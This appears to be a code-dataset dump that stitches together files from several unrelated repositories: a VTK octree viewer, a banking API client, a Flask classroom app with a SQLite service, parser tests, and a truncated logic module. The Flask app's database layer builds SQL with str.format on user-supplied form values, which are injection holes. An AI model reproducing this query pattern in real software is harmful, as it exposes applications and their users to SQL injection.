lines.append ( camvtk.Line(p1=(p[2].x,p[2].y,p[2].z),p2=(p[6].x,p[6].y,p[6].z)) )
lines.append ( camvtk.Line(p1=(p[6].x,p[6].y,p[6].z),p2=(p[7].x,p[7].y,p[7].z)) )
lines.append ( camvtk.Line(p1=(p[4].x,p[4].y,p[4].z),p2=(p[7].x,p[7].y,p[7].z)) )
lines.append ( camvtk.Line(p1=(p[4].x,p[4].y,p[4].z),p2=(p[3].x,p[3].y,p[3].z)) )
lines.append ( camvtk.Line(p1=(p[5].x,p[5].y,p[5].z),p2=(p[3].x,p[3].y,p[3].z)) )
lines.append ( camvtk.Line(p1=(p[5].x,p[5].y,p[5].z),p2=(p[7].x,p[7].y,p[7].z)) )
if node.type == cam.OCType.WHITE:
color = nodeColor(node)
if node.type == cam.OCType.GREY:
color = camvtk.white
if node.type == cam.OCType.BLACK:
color = camvtk.grey
for li in lines:
li.SetColor( color )
if node.type==cam.OCType.BLACK:
li.SetOpacity(0.1)
if node.type==cam.OCType.GREY:
li.SetOpacity(0.2)
myscreen.addActor(li)
def drawNode2(myscreen, node):
if node.type == cam.OCType.BLACK:
return # don't draw intermediate nodes
if node.type == cam.OCType.GREY:
return # don't draw intermediate nodes
p = []
for n in xrange(1,9):
p1 = node.nodePoint(n)
p.append(p1)
lines = []
for n in xrange(0,8):
lines.append ( camvtk.Point(center=(p[n].x,p[n].y,p[n].z) ) )
if node.type == cam.OCType.WHITE:
color = nodeColor(node)
if node.type == cam.OCType.GREY:
color = camvtk.white
if node.type == cam.OCType.BLACK:
color = camvtk.grey
for li in lines:
li.SetColor( color )
if node.type==cam.OCType.BLACK:
li.SetOpacity(0.1)
if node.type==cam.OCType.GREY:
li.SetOpacity(0.2)
myscreen.addActor(li)
def drawNode3(myscreen, node):
if node.type == cam.OCType.BLACK:
return # don't draw intermediate nodes
if node.type == cam.OCType.GREY:
return # don't draw intermediate nodes
if node.type == cam.OCType.WHITE:
ccolor = nodeColor(node)
if node.type == cam.OCType.GREY:
ccolor = camvtk.white
if node.type == cam.OCType.BLACK:
ccolor = camvtk.grey
cen = node.nodePoint(0)
cube = camvtk.Cube(center=(cen.x, cen.y, cen.z), length= node.scale, color=camvtk.green)
#cube.SetWireframe()
#cube.SetOpacity(0.2)
myscreen.addActor( cube )
def drawOCT(myscreen, oct, color, opacity=1.0):
nodes = oct.get_white_nodes()
for node in nodes:
cen = node.nodePoint(0)
cube = camvtk.Cube(center=(cen.x, cen.y, cen.z), length= node.scale, color=color)
cube.SetOpacity(opacity)
#cube.SetWireframe()
myscreen.addActor( cube )
if __name__ == "__main__":
#exit()
#oct = cam.OCTNode()
myscreen = camvtk.VTKScreen()
myscreen.camera.SetPosition(20, 12, 2)
myscreen.camera.SetFocalPoint(0,0, 0)
#print oct.str()
"""
print "max scale=", oct.get_max_scale()
for n in xrange(0,9):
p1 = oct.nodePoint(n)
myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=camvtk.red))
print "id=%i" % (n),
print p1.str()
print "child centers:"
for n in xrange(1,9):
p1 = oct.childCenter(n)
myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=camvtk.yellow))
print "id=%i" % (n),
print p1.str()
"""
xar = camvtk.Arrow(color=red, rotXYZ=(0,0,0))
myscreen.addActor(xar)
yar = camvtk.Arrow(color=green, rotXYZ=(0,0,90))
myscreen.addActor(yar)
zar = camvtk.Arrow(color=blue, rotXYZ=(0,-90,0))
myscreen.addActor(zar)
oc2 = cam.OCTest()
oc2.set_max_depth(5)
svol = cam.SphereOCTVolume()
svol.radius=3.1415
svol.center = cam.Point(-1,2,-1)
oc2.setVol(svol)
oc2.build_octree()
oc3 = cam.OCTest()
svol3 = cam.SphereOCTVolume()
svol3.radius=2
svol3.center = cam.Point(-1,2,1)
cvol = cam.CubeOCTVolume()
cvol.side = 3
cvol.center = cam.Point(2.0,2,-1)
oc3.setVol(cvol)
oc3.set_max_depth(5)
oc3.build_octree()
iters = oc3.prune_all()
iters = oc2.prune_all()
nlist = oc2.get_all_nodes()
print " oc2 got ", len(nlist), " nodes"
nlist = oc2.get_white_nodes()
print " oc2 got ", len(nlist), " white nodes"
nlist = oc3.get_all_nodes()
print " oc3 got ", len(nlist), " nodes"
print "calling balance"
oc2.balance(oc3)
print "after balance:"
nlist = oc2.get_all_nodes()
print " oc2 got ", len(nlist), " nodes"
nlist = oc2.get_white_nodes()
print " oc2 got ", len(nlist), " white nodes"
print "calling diff"
oc2.diff(oc3)
print "after diff:"
nlist = oc2.get_all_nodes()
print " oc2 got ", len(nlist), " nodes"
nlist = oc2.get_white_nodes()
print " oc2 got ", len(nlist), " white nodes"
drawOCT(myscreen, oc2, camvtk.green)
#drawOCT(myscreen, oc3, camvtk.red, opacity=0.1)
#exit()
#for node in nlist2:
# pass
#print node.str()
#p1 = node.nodePoint(0)
# drawNode3( myscreen, node )
#myscreen.addActor( camvtk.Sphere(center=(p1.x, p1.y, p1.z), radius=0.1, color=sph_color))
myscreen.render()
myscreen.iren.Start()
exit()
#oct = OCTNode(level=0)
testvol = Volume()
print "building tree...",
tree = buildOCTree(testvol)
print "done."
print tree
list =[]
searchOCTree(tree, list)
print len(list), " nodes in tree"
w2if = vtk.vtkWindowToImageFilter()
w2if.SetInput(myscreen.renWin)
lwr = vtk.vtkPNGWriter()
lwr.SetInput( w2if.GetOutput() )
w2if.Modified()
t = camvtk.Text()
t.SetPos( (myscreen.width-200, myscreen.height-30) )
myscreen.addActor( t)
t2 = camvtk.Text()
t2.SetPos( (myscreen.width-200, 30) )
myscreen.addActor( t2)
n = 0
for node in list:
addNodes(myscreen, node)
if (n%50) == 0:
nodetext = "Nodes: %5i" % (n)
t2.SetText(nodetext)
t.SetText("OpenCAMLib 10.03-beta " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
myscreen.render()
myscreen.camera.Azimuth( 3 )
print "frame %i of %i" % (n, len(list))
w2if.Modified()
lwr.SetFileName("frames/oct"+ ('%05d' % n)+".png")
#lwr.Write()
n = n +1
#time.sleep(0.1)
print "done!"
#raw_input("Press Enter to terminate")
``` |
{
"source": "johnyenter-briars/BudgetBattles",
"score": 3
} |
#### File: johnyenter-briars/BudgetBattles/APIConnectionService.py
```python
from models.ResponseModels import *
import requests
import json
class ApiConnectionService():
def __init__(self):
self._apiKey = open("apikey.txt").read()
self._baseurl = "http://api.reimaginebanking.com/"
def GetAllValidOpponents(self, initiator_id):
url = self._baseurl + "customers?key={0}".format(self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if response.status_code == 200:
customers = json.loads(response.text)
target_customers = [
customer for customer in customers
if customer['_id'] != initiator_id and self.GetAccountInformation(customer['_id']) != None]
return target_customers
else:
print(response.status_code)
return None
def SearchForCustomerId(self, customer_first: str, customer_last: str):
url = self._baseurl + "customers?key={0}".format(self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if response.status_code == 200:
customers = json.loads(response.text)
target_customers = [customer for customer in customers if customer['first_name'] == customer_first and customer['last_name'] == customer_last]
if len(target_customers) == 1:
return target_customers[0]['_id']
else:
print("Duplicate customers in database!")
return None
else:
print(response.status_code)
return None
def GetCustomerInformation(self, customer_id: str) -> GetCustomerInfoResponse:
url = self._baseurl + "customers/{0}?key={1}".format(customer_id, self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if response.status_code == 200:
return GetCustomerInfoResponse(response)
else:
print(response.status_code)
def GetAccountInformation(self, customer_id: str) -> GetCustomerAccountResponse:
url = self._baseurl + "customers/{0}/accounts?key={1}".format(customer_id, self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if json.loads(response.text) == []:
return None
elif response.status_code == 200:
print("This person has an account!")
return GetCustomerAccountResponse(response)
else:
return None
def GetAllWithdrawals(self, customer_id):
account_id = self.GetAccountInformation(customer_id).get_account_number()
url = self._baseurl + "accounts/{0}/withdrawals?key={1}".format(account_id, self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if response.status_code == 200:
return GetAllWithdrawalsResponse(response)
else:
print(response.status_code)
def GetAllDeposits(self, customer_id):
account_id = self.GetAccountInformation(customer_id).get_account_number()
url = self._baseurl + "accounts/{0}/deposits?key={1}".format(account_id, self._apiKey)
response = requests.get(
url,
headers={'content-type':'application/json'},
)
if response.status_code == 200:
return GetAllDepositsResponse(response)
else:
print(response.status_code)
``` |
{
"source": "johnyenter-briars/Grove",
"score": 2
} |
#### File: Grove/app/award.py
```python
from flask import Flask, request, redirect, render_template, json, session, jsonify,url_for
from app import app, database
from datetime import datetime
from time import gmtime, strftime
@app.route('/award')
def awardapplespage():
sess = json.loads(session['user_auth'])
if not sess:
return redirect('/')
first = sess.get('_FirstName')
last = sess.get('_LastName')
projectID = sess.get('_ProjectID')
profileID = sess.get('_StudentID')
visibleStudents = []
validPage = 0
if session['user_type'] == "STUDENT":
validPage = 10 - database.getStudent(profileID).getApplesAwarded()
for student in database.getStudentsOnProject(projectID):
if(student.getStudentID() != profileID):
visibleStudents.append(student)
elif session['user_type'] == "TEACHER":
for project in database.getProjectsForTeacher(sess.get('_TeacherID')):
visibleStudents += database.getStudentsOnProject(project.getProjectID())
validPage = len(visibleStudents)
possibleApples = database.getValidAppleTypes()
return render_template("awardapples.html", projectID=projectID,
name='{} {}'.format(first, last),profileID=profileID,
visibleStudents=visibleStudents, possibleApples=possibleApples, validPage = validPage)
@app.route('/awardapples', methods=['POST'])
def awardapple():
sess = json.loads(session['user_auth'])
if not sess:
return redirect('/')
student = sess.get('_StudentID')
if(student != None ):
appleNumber = database.getStudent(student).getApplesAwarded()
if(appleNumber == 0):
time = strftime("%Y-%m-%d %H:%M:%S", gmtime())
database.insertAward(student, "Red", "Being Humble", time)
for key,value in request.form.items():
targetProject = database.getStudentProject(int(key))
if(student != None):
database.updateAwardedApples(student)
database.insertAward(int(key), value, targetProject.getProjectName(), strftime("%Y-%m-%d %H:%M:%S", gmtime()))
return redirect(url_for("awardapplespage"))
```
#### File: Grove/app/profile.py
```python
from flask import Flask, request, redirect, render_template, json, session, jsonify,url_for
from app import app, database
from exceptions.NoProfileIDException import NoProfileIDException
from time import gmtime, strftime
@app.route('/profile/')
def profile():
if request.args.get('profileID') == None:
raise NoProfileIDException
sess = json.loads(session['user_auth'])
if not sess:
return redirect('/')
ufirst = sess.get('_FirstName')
ulast = sess.get('_LastName')
userName = ufirst + ' ' + ulast
profileID = sess.get('_StudentID')
projectID = sess.get('_ProjectID')
currentProfileID = request.args.get('profileID')
sess = json.loads(session['user_auth'])
studentID = sess.get('_StudentID')
teacherID = sess.get('_TeacherID')
branches = database.getBranchesForStudent(currentProfileID)
awards = database.getAwardsForStudent(currentProfileID)
tasks = database.getTasksForStudent(currentProfileID)
first = database.getStudent(currentProfileID).getFirstName()
last = database.getStudent(currentProfileID).getLastName()
targetProjectID = database.getStudentProject(currentProfileID).getProjectID()
return render_template("profile.html",
targetProfileName=first+' '+last, branches=branches,
awards=awards, tasks=tasks, projectID=projectID,
studentID=studentID, teacherID=teacherID,
profileID=sess.get('_StudentID'),
targetProjectID=targetProjectID,
name='{} {}'.format(sess.get('_FirstName'), sess.get('_LastName')))
```
#### File: johnyenter-briars/Grove/app.py
```python
from app import app
@app.shell_context_processor
def make_shell_context():
return None
```
#### File: Grove/app/teacherconsole.py
```python
from flask import Flask, request, redirect, render_template, json, session, jsonify,url_for
from app import app, database
@app.route('/teacherconsole')
def teacherconsole():
sess = json.loads(session['user_auth'])
if not sess:
return redirect('/')
first = sess.get('_FirstName')
last = sess.get('_LastName')
tasksToReview = database.getTasksToBeReviewed()
studentID = sess.get('_StudentID')
teacherID = sess.get('_TeacherID')
students = database.getClassList(teacherID)
projects = [project for project in database.getProjects() if project.getTeacherID() == teacherID]
return render_template("teacherconsole.html", name='{} {}'.format(first, last), teacherID=teacherID, studentID=studentID, students=students, projects=projects, tasksToReview=tasksToReview,database=database)
@app.route('/addstudent/', methods=['POST', 'GET'])
def addStudent():
if request.method == 'POST':
fname = request.form['studentFName']
lname = request.form['studentLName']
projID = request.form['projectID']
database.insertNewStudent(
fname, lname,
int(json.loads(session['user_auth']).get('_TeacherID')),
int(projID), "perm0")
return render_template("teacherconsole.html",
name = json.loads(session['user_auth']).get('_FirstName'))
```
#### File: Grove/exceptions/NoProfileIDException.py
```python
class NoProfileIDException(Exception):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._messageString = "The user navigated to a page without providing a profileID in the query string"
```
#### File: Grove/exceptions/NoTaskIDException.py
```python
class NoTaskIDException(Exception):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._messageString = "The user navigated to a page without providing a taskID in the query string"
def getMessageString():
return self._messageString
```
#### File: Grove/models/Apple.py
```python
class Apple(object):
def __init__(self, appleTuple):
super().__init__()
self._AppleType = appleTuple[0]
def getAppleType(self):
return self._AppleType
```
#### File: Grove/models/Project.py
```python
class Project(object):
def __init__(self, projectTuple):
super().__init__()
self._ProjectID = projectTuple[0]
self._TeacherID = projectTuple[1]
self._GrowthStatus = projectTuple[2]
self._ProjectName = projectTuple[3]
self._ProjectDescription = projectTuple[4]
def getProjectID(self):
return self._ProjectID
def getTeacherID(self):
return self._TeacherID
def getGrowthStatus(self):
return self._GrowthStatus
def getProjectName(self):
return self._ProjectName
def getProjectDesc(self):
return self._ProjectDescription
```
#### File: Grove/models/TaskReview.py
```python
class TaskReview(object):
def __init__(self, taskTuple):
super().__init__()
self._ReviewID = taskTuple[0]
self._TaskID = taskTuple[1]
self._Resolved = taskTuple[2]
self._Rating = taskTuple[3]
def getTaskID(self):
return self._TaskID
def getReviewID(self):
return self._ReviewID
def getResolved(self):
return self._Resolved == 1
def getRating(self):
return self._Rating
```
#### File: Grove/models/Teacher.py
```python
class Teacher(object):
def __init__(self, teacherTuple):
super().__init__()
self._TeacherID = teacherTuple[0]
self._FirstName = teacherTuple[1]
self._LastName = teacherTuple[2]
self._PermissionLevel = teacherTuple[3]
def getTeacherID(self):
return self._TeacherID
def getFirstName(self):
return self._FirstName
def getLastName(self):
return self._LastName
def getPermissionLevel(self):
return self._PermissionLevel
```
#### File: Grove/services/DatabaseService.py
```python
import sqlite3
from models.Student import Student
from models.Teacher import Teacher
from models.Project import Project
from models.UserCredentials import UserCredentials
from models.Branch import Branch
from models.Award import Award
from services.FlattenerService import BranchFlattener
from models.Files import Files
from models.Task import Task
from models.Chat import Chat
from models.TaskReview import TaskReview
from models.Goal import Goal
from models.Apple import Apple
from models.MessageNotifications import MessageNotifications
import os
DATABASE_PATH = 'database_files/Grove.db'
class DatabaseService(object):
def __init__(self):
super().__init__()
self._db = None
self.set_db()
def set_db(self):
self._db = sqlite3.connect(DATABASE_PATH, check_same_thread=False)
def get_db(self):
return self._db
def getValidAppleTypes(self):
return [Apple(tuple) for tuple in self._db.execute("select * from AppleType;").fetchall()]
def getUserCredentials(self):
return [UserCredentials(tuple) for tuple in self._db.execute("select * from UserCredentials;").fetchall()]
def getStudents(self):
return [Student(tuple) for tuple in self._db.execute("select * from Student;").fetchall()]
def getTeachers(self):
return [Teacher(tuple) for tuple in self._db.execute("select * from Teacher;").fetchall()]
def getStudentProject(self, StudentID):
return [Project(tuple) for tuple in
self._db.execute("""select * from Project where ProjectID =
(select ProjectID from Student where StudentID = {id});""".format(id=StudentID))
.fetchall()][0]
def getStudent(self, StudentID):
return [Student(tuple) for tuple in self._db.execute(
"""select * from Student where StudentID={id};""".format(id=StudentID)).fetchall()][0]
def getTeacher(self, TeacherID):
return [Teacher(tuple) for tuple in self._db.execute(
"""select * from Teacher where TeacherID={id};""".format(id=TeacherID)).fetchall()][0]
def getBranchesForProject(self, ProjectID):
return BranchFlattener(
self._db.execute("""select * from Branch where ProjectID={id};"""
.format(id=ProjectID)).fetchall()).flatten()
def getBranchesForStudent(self, StudentID):
return BranchFlattener(
self._db.execute("""select * from Branch where StudentID={id};"""
.format(id=StudentID)).fetchall()).flatten()
def getTask(self, TaskID):
return [Task(tuple) for tuple in self._db.execute("""
select * from Task where TaskID={id};"""
.format(id=TaskID)).fetchall()][0]
def getTasksForBranch(self, BranchID, ProjectID):
return [Task(tuple) for tuple in self._db.execute("""
select * from Task where BranchID={bid} and ProjectID={pid};"""
.format(bid=BranchID, pid=ProjectID)).fetchall()]
def getTasksForProject(self, ProjectID):
return [Task(tuple) for tuple in self._db.execute("""
select * from Task where ProjectID={pid};"""
.format(pid=ProjectID)).fetchall()]
def getAwardsForStudent(self, StudentID):
return [Award(tuple) for tuple in self._db.execute(
"""select * from Award where StudentID={id};""".format(id=StudentID)).fetchall()]
def getTasksForStudent(self, StudentID):
return [Task(tuple) for tuple in self._db.execute(
"""select * from Task where StudentID={id};""".format(id=StudentID)).fetchall()]
def getProjectsForTeacher(self, TeacherID):
return [Project(tuple) for tuple in self._db.execute("""
select * from Project where TeacherID={id};"""
.format(id=TeacherID)).fetchall()]
def getClassList(self, TeacherID):
return [Student(tuple) for tuple in self._db.execute(
"""select * from Student where TeacherID={id};""".format(id=TeacherID)).fetchall()]
def getProject(self, ProjectID):
return [Project(tuple) for tuple in self._db.execute("""
select * from Project where ProjectID={id}"""
.format(id=ProjectID)).fetchall()][0]
def getStudentsOnProject(self, ProjectID):
return [Student(tuple) for tuple in self._db.execute("""
select * from Student where ProjectID={id}"""
.format(id=ProjectID)).fetchall()]
def getProjects(self):
return [Project(tuple) for tuple in self._db.execute("select * from Project").fetchall()]
def insertAward(self,StudentID:int,AppleType:str,ProjectName:str,DateAwarded:str):
try:
self._db.execute("""insert into Award("StudentID", "apple_type", "ProjectName", "DateAwarded")
values({id}, "{type}", "{name}", "{date}");"""
.format(id=StudentID,type=AppleType,name=ProjectName,date=DateAwarded))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def addMessage(self, UserName, TaskID, TimeStmp, MessageString, StudentID):
self._db.execute(""" INSERT INTO Chat
(UserName, TaskID, TimeStmp, MessageString) VALUES (?, ?, ?, ?)""", (UserName, TaskID, TimeStmp, MessageString))
self._db.commit()
ProjectID = self.getTask(TaskID).getProjectID()
students = self.getStudentsOnProject(ProjectID)
for student in students:
if student.getStudentID() != StudentID:
self._db.execute(""" INSERT INTO MessageNotifications
(MessageContent, TaskID, Viewed, StudentID) VALUES (?, ?, ?, ?)""", (MessageString, TaskID, 0, student.getStudentID()))
self._db.commit()
def removeNotification(self, NotificationID):
try:
self._db.execute(""" DELETE FROM MessageNotifications
WHERE NotificationID = ?""", (NotificationID,))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def getNotifications(self, StudentID, TaskID):
try:
return [MessageNotifications(tuple) for tuple in self._db.execute("""
select * from MessageNotifications where TaskID={tid} and StudentID={sid};"""
.format(tid=TaskID, sid=StudentID)).fetchall()]
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def getChatForTask(self, TaskID):
return [Chat(tuple) for tuple in self._db.execute(
"""select * from Chat where TaskID={id};""".format(id=TaskID)).fetchall()]
def getGoalForProject(self, ProjectID):
return [Goal(tuple) for tuple in self._db.execute("""
select * from ProjectGoal where ProjectID = {id}"""
.format(id=ProjectID)).fetchall()][0]
def getFilesForTask(self, TaskID):
return [Files(tuple) for tuple in self._db.execute(
"""select * from Files where TaskID={id};""".format(id=TaskID)).fetchall()]
def addFile(self, TaskID, FileName, FileType):
try:
self._db.execute(""" INSERT INTO Files
(TaskID, FileName, FileType) VALUES (?, ?, ?)""", (TaskID, FileName, FileType))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def removeFile(self, FileName):
try:
self._db.execute(""" DELETE FROM Files
WHERE FileName = ?""", (FileName,))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def insertNewStudent(self, FirstName:str, LastName:str, TeacherID:int, ProjectID: int, PermissionLevel:str):
try:
self._db.execute("""insert into Student(FirstName, LastName, TeacherID,
ProjectID, RoleType)
values("{fname}", "{lname}", {teachID}, {projID}, "{permLvl}");"""
.format(fname=FirstName, lname=LastName, teachID=TeacherID,
projID=ProjectID, permLvl=PermissionLevel))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def insertNewTask(self, BranchID: int, StudentID: int, ProjectID: int, TaskDesc: str, TaskWeight: int):
try:
self._db.execute("""insert into Task
(BranchID, StudentID, ProjectID, TaskDescription, Resolved, Weight)
values({bID}, {sID}, {pID}, "{tDesc}", 0, "{tWght}");"""
.format(bID=BranchID, sID=StudentID, pID=ProjectID, tDesc=TaskDesc, tWght=TaskWeight))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def insertTaskReview(self, TaskID: int):
try:
self._db.execute("""insert into TaskReview
(TaskID, Resolved, Rating)
values({tID}, 0, 0);"""
.format(tID=TaskID))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def markTaskResolved(self, TaskID: int, Rating: int):
try:
self._db.execute("""UPDATE TaskReview
SET Resolved = 1, Rating = {Rating}
WHERE TaskID = {tID}"""
.format(tID=TaskID, Rating=Rating))
self._db.execute("""UPDATE Task
SET Resolved = 1
WHERE TaskID = {tID}"""
.format(tID=TaskID, Rating=Rating))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def getTasksToBeReviewed(self):
return [TaskReview(tuple) for tuple in self._db.execute("select * from TaskReview").fetchall()]
def getTaskReviewedStatus(self, TaskID: int):
return [TaskReview(tuple) for tuple in self._db.execute(
"""select * from TaskReview where TaskID={id};""".format(id=TaskID)).fetchall()]
def updateAwardedApples(self, StudentID: int):
self._db.execute("""UPDATE Student SET ApplesAwarded = ApplesAwarded + 1 WHERE StudentID = {StudentID}""".format(StudentID=StudentID))
self._db.commit()
def updateTaskCreation(self, StudentID: int):
self._db.execute("""UPDATE Student SET FirstTask = 1 WHERE StudentID = {StudentID}""".format(StudentID=StudentID))
self._db.commit()
def updateGrowthStatus(self, ProjectID, GrowthStatus: str):
try:
self._db.execute("""UPDATE Project
SET GrowthStatus = '{gStatus}'
WHERE ProjectID = {pID}"""
.format(gStatus=GrowthStatus, pID=ProjectID))
self._db.commit()
except sqlite3.Error as error:
print("Failed to insert data into sqlite table", error)
def getTaskReviewsForProject(self, ProjectID: int):
return [TaskReview(tuple) for tuple in self._db.execute(
"""select * from Taskreview where taskid in
(select TaskID from Task where ProjectID = {projID});"""
.format(projID=ProjectID))]
def close_connection(self, exception):
self._db.close()
``` |
{
"source": "johnyf/astutils",
"score": 3
} |
#### File: examples/foo/lexyacc.py
```python
import astutils
from foo.ast import Nodes
TABMODULE = 'foo.calc_parsetab'
class Lexer(astutils.Lexer):
"""Lexer for Boolean formulae."""
reserved = {
'False': 'FALSE',
'True': 'TRUE'}
delimiters = ['LPAREN', 'RPAREN', 'COMMA']
operators = ['NOT', 'AND', 'OR', 'XOR', 'IMP', 'BIMP',
'EQUALS', 'NEQUALS']
misc = ['NAME', 'NUMBER']
def t_NAME(self, t):
r"[A-Za-z_][A-za-z0-9]*"
t.type = self.reserved.get(t.value, 'NAME')
return t
def t_AND(self, t):
r'\&\&'
t.value = '&'
return t
def t_OR(self, t):
r'\|\|'
t.value = '|'
return t
t_NOT = r'\!'
t_XOR = r'\^'
t_LPAREN = r'\('
t_RPAREN = r'\)'
t_NUMBER = r'\d+'
t_IMP = '->'
t_BIMP = '\<->'
t_ignore = " \t"
def t_comment(self, t):
r'\#.*'
return
def t_newline(self, t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
class Parser(astutils.Parser):
"""Parser for Boolean formulae."""
tabmodule = TABMODULE
start = 'expr'
# low to high
precedence = (
('left', 'BIMP'),
('left', 'IMP'),
('left', 'XOR'),
('left', 'OR'),
('left', 'AND'),
('left', 'EQUALS', 'NEQUALS'),
('right', 'NOT'))
Lexer = Lexer
nodes = Nodes
def p_bool(self, p):
"""expr : TRUE
| FALSE
"""
p[0] = self.nodes.Bool(p[1])
def p_number(self, p):
"""expr : NUMBER"""
p[0] = self.nodes.Num(p[1])
def p_var(self, p):
"""expr : NAME"""
p[0] = self.nodes.Var(p[1])
def p_unary(self, p):
"""expr : NOT expr"""
p[0] = self.nodes.Unary(p[1], p[2])
def p_binary(self, p):
"""expr : expr AND expr
| expr OR expr
| expr XOR expr
| expr IMP expr
| expr BIMP expr
| expr EQUALS expr
| expr NEQUALS expr
"""
p[0] = self.nodes.Binary(p[2], p[1], p[3])
def p_paren(self, p):
"""expr : LPAREN expr RPAREN"""
p[0] = p[2]
def _rewrite_tables(outputdir='./'):
astutils.rewrite_tables(Parser, TABMODULE, outputdir)
# this is a convenience to regenerate the tables
# during development
if __name__ == '__main__':
_rewrite_tables()
```
#### File: astutils/tests/ast_test.py
```python
from astutils import ast
def test_terminal():
value = 'a'
t = ast.Terminal(value)
r = repr(t)
assert r == "Terminal('a', 'terminal')", r
r = str(t)
assert r == 'a', r
r = len(t)
assert r == 1, r
r = t.flatten()
assert r == value, r
def test_hash():
# different AST node instances should
# have different hash
#
# terminals
value = 'foo'
a = ast.Terminal(value)
b = ast.Terminal(value)
assert hash(a) != hash(b)
# operators
op = 'bar'
a = ast.Operator(op)
b = ast.Operator(op)
assert hash(a) != hash(b)
def test_eq():
value = 'a'
t = ast.Terminal(value)
p = ast.Terminal(value)
assert t == p, (t, p)
p = ast.Terminal('b')
assert t != p, (t, p)
p = ast.Terminal(value, 'number')
assert t != p, (t, p)
p = 54
assert t != p, (t, p)
def test_operator():
a = ast.Terminal('a')
b = ast.Terminal('b')
op = '+'
operands = [a, b] # 'a', 'b' fail due to `str`
t = ast.Operator(op, *operands)
r = repr(t)
r_ = (
"Operator('+', "
"Terminal('a', 'terminal'), "
"Terminal('b', 'terminal'))")
assert r == r_, r
r = str(t)
assert r == '(+ a b)', r
r = len(t)
assert r == 3, r
r = t.flatten()
assert r == '( + a, b )', r
```
#### File: astutils/tests/ply_test.py
```python
import os
import astutils.ply
from nose import tools as nt
class Lexer(astutils.ply.Lexer):
operators = ['NOT', 'AND']
misc = ['NAME']
t_NAME = r"[A-Za-z_][A-za-z0-9]*"
t_NOT = r'~'
t_AND = r'/\\'
t_ignore = ' \t'
class Parser(astutils.ply.Parser):
tabmodule = 'testing_parsetab'
start = 'expr'
precedence = (
('left', 'AND'),
('right', 'NOT'))
Lexer = Lexer
def p_not(self, p):
"""expr : NOT expr"""
p[0] = not p[2]
def p_and(self, p):
"""expr : expr AND expr"""
p[0] = p[1] and p[3]
def p_name(self, p):
"""expr : NAME"""
s = p[1]
p[0] = self.names[s]
def test_parser():
parser = Parser()
parser.names = {'True': True, 'False': False}
s = 'True'
r = parser.parse(s)
assert r is True, r
s = 'True /\ True'
r = parser.parse(s)
assert r is True, r
s = 'False /\ True'
r = parser.parse(s)
assert r is False, r
s = '~ False /\ ~ True'
r = parser.parse(s)
assert r is False, r
s = '~ False /\ True'
r = parser.parse(s)
assert r is True, r
def test_illegal_character():
parser = Parser()
parser.names = {'True': True}
s = '( True'
with nt.assert_raises(Exception):
parser.parse(s)
def test_syntax_error():
parser = Parser()
parser.names = {'True': True}
s = 'True True'
with nt.assert_raises(Exception):
parser.parse(s)
def test_rewrite_tables():
prefix = 'foo'
outputdir = './'
for ext in ('.py', '.pyc'):
try:
os.remove(prefix + ext)
except:
pass
f = prefix + '.py'
assert not os.path.isfile(f)
astutils.ply.rewrite_tables(
Parser, prefix, outputdir)
assert os.path.isfile(f)
``` |
{
"source": "johnyf/contract_maker",
"score": 2
} |
#### File: johnyf/contract_maker/contracts_pinfo.py
```python
import copy
import logging
import math
import pprint
from dd import autoref
from dd import cudd
from omega.logic import syntax as stx
from omega.symbolic import bdd as scope
from omega.symbolic import bdd as sym_bdd
import bdd as _bdd
import closure_noninterleaving as _closure
import cpre_noninterleaving as cpre
import fixpoint_noninterleaving as fx
import masks as _masks
import symbolic as sym
from symbolic import print_expr, dumps_expr
import utils
log = logging.getLogger(__name__)
LOG = 100
TURN = utils.TURN
def parametric_predicate(pred, aut):
pred_r = aut.let(aut.x_to_r, pred)
u = aut.selector & pred_r
u = aut.exist(aut.hr, u)
return u
def observable(target, within, inv, aut):
"""Return states that `player` can tell satisfy `target`."""
assert scope.is_state_predicate(target)
assert scope.is_state_predicate(within)
assert scope.is_state_predicate(inv)
within_r = aut.let(aut.x_to_r, within)
inv_r = aut.let(aut.x_to_r, inv)
target_r = aut.let(aut.x_to_r, target)
#
# Mask(m, v, h) == (IF m = TRUE THEN h ELSE x)
# Selector(h, r) == r = Mask(m, v, h)
#
# Observable(x, y, m, Target(_, _, _)) ==
# /\ \E h:
# LET r == Mask(m, v, h)
# IN Inv(r, y)
# /\ \A h:
# LET r == Mask(m, h, x)
# IN Within(r, y, m) => Target(r, y, m)
# <=>
# /\ \E h, r:
# /\ Selector(h, r)
# /\ Inv(r, y)
# /\ \A h: \E r:
# /\ Selector(h, r)
# /\ Within(r, y, m) => Target(r, y, m)
u = target_r | ~ within_r
u &= aut.selector
u = aut.exist(aut.r, u)
u = aut.forall(aut.h, u)
# \E h, r:
# /\ Selector(h, r)
# /\ Inv(r, y)
u &= aut.exist(aut.hr, inv_r & aut.selector)
# check support
vrs = aut.vars_of_all_players | aut.masks
assert scope.support_issubset(u, vrs, aut), (
aut.support(u) - vrs)
return u
def maybe(target, within, aut):
"""Return `aut.observer` states that could satisfy `target`.
This function is equivalent to:
/\ observable(target, within, aut)
/\ param_inv
"""
assert scope.is_state_predicate(target)
assert scope.is_state_predicate(within)
within_r = aut.let(aut.x_to_r, within)
target_r = aut.let(aut.x_to_r, target)
#
